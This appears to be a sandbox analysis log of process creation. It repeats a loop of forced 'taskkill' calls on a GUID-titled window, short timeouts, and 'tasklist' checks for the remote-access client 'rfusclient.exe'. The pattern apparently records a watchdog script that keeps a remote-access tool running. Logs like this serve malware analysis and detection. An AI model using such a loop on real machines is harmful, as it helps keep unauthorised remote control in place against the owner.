Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknownProcess created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
